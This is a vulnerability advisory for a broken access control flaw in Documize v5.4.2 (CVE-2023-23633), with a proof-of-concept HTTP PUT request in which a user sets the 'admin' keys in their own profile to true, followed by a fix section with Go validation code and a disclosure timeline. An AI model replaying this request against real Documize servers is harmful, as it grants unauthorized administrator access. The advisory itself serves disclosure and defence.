usd-2022-0065 | Documize v5.4.2 (221021105923) - Broken Access Control
Advisory ID: usd-2022-0065
Product: Documize
Affected Version: v5.4.2 (221021105923)
Vulnerability Type: Broken Access Control (CWE-284)
Security Risk: Critical
Vendor URL: https://www.documize.com
Vendor Status: Not fixed
CVE number: CVE-2023-23633
Description
A broken access control vulnerability was found in Documize, which allows a user to grant themselves admin permissions.
Proof of Concept
The following request was sent to update a user's profile.
PUT /api/users/cee5ocin9t3sjau0153g HTTP/1.1
Host: localhost:5001
Content-Length: 698
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: json
authorization: ey[REDACTED]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.99 Safari/537.36
[...]{"firstname":"jane","lastname":"doe","email":"janedoe@example.com","initials":"JD","active":true,"editor":true,"admin":false,"viewUsers":true,"analytics":false,"global":false,"accounts":[{"id":"cee5ocin9t3sjau01540","created":"2022-12-15T19:53:22.974178Z","revised":"2022-12-15T19:59:07.184606Z","admin":false,"editor":true,"viewUsers":true,"analytics":false,"userId":"cee5ocin9t3sjau0153g","orgId":"cee5o0qn9t3sjau010c0","company":"Test","title":"Test","message":"Documize Community instance contains all our documentation","domain":"","active":true,"theme":""}],"groups":null,"lastVersion":"","theme":"","created":"2022-12-15T19:53:22.973889Z","revised":"2022-12-15T19:59:07.183878Z","locale":""}
Changing the admin keys to true results in higher privileges.
Fix
Do not allow users to edit any fields on their database entry.
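A narrower server-side check than the fix above, as an added Go example that is not Documize's code: it compares the permission keys of a submitted body, top-level and per account, with the stored record and rejects any difference unless the authenticated caller is already an admin. The `Flags` and `Profile` types, `CheckUpdate`, `ErrEscalation` and the reduced sample record are assumptions made for illustration.

```go
package main

import (
	"encoding/json"
	"fmt"
	"strings"
)

// Flags holds the permission keys of the body; encoding/json matches the names case-insensitively.
type Flags struct{ Active, Editor, Admin, ViewUsers, Analytics, Global bool }
// Profile mirrors only the parts of the user record that the check needs (hypothetical type).
type Profile struct {
	Flags
	Accounts []struct {
		ID string
		Flags
	}
}

var ErrEscalation = fmt.Errorf("non-admin request changes permission fields")
// Constructed sample: the stored record, reduced from the request body above.
const storedJSON = `{"active":true,"editor":true,"admin":false,"viewUsers":true,"accounts":[{"id":"cee5ocin9t3sjau01540","active":true,"editor":true,"viewUsers":true,"admin":false}]}`

// CheckUpdate rejects a body whose permission keys differ from the stored record unless the caller is an admin.
func CheckUpdate(stored Profile, body []byte, callerIsAdmin bool) error {
	var req Profile
	if err := json.Unmarshal(body, &req); err != nil {
		return err
	}
	byID := map[string]Flags{} // stored per-account flags, keyed by account id
	for _, a := range stored.Accounts {
		byID[a.ID] = a.Flags
	}
	changed := req.Flags != stored.Flags
	for _, a := range req.Accounts {
		f, known := byID[a.ID]
		changed = changed || !known || f != a.Flags
	}
	if changed && !callerIsAdmin {
		return ErrEscalation
	}
	return nil
}

func main() {
	var stored Profile
	_ = json.Unmarshal([]byte(storedJSON), &stored)
	tampered := strings.ReplaceAll(storedJSON, `"admin":false`, `"admin":true`)
	fmt.Println(CheckUpdate(stored, []byte(storedJSON), false), CheckUpdate(stored, []byte(tampered), false))
}
```

Keys missing from a body decode as false, so a partial body that omits a flag set in the stored record is rejected as well.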
Timeline
- 2022-12-16: First contact request via mail
- 2023-01-09: Second contact request via mail
- 2023-01-16: Try to contact vendor again
- 2023-02-02: Try to contact vendor again
- 2023-12-22: Publish advisory
Credits
This security vulnerability was identified by Christian Pöschl of usd AG.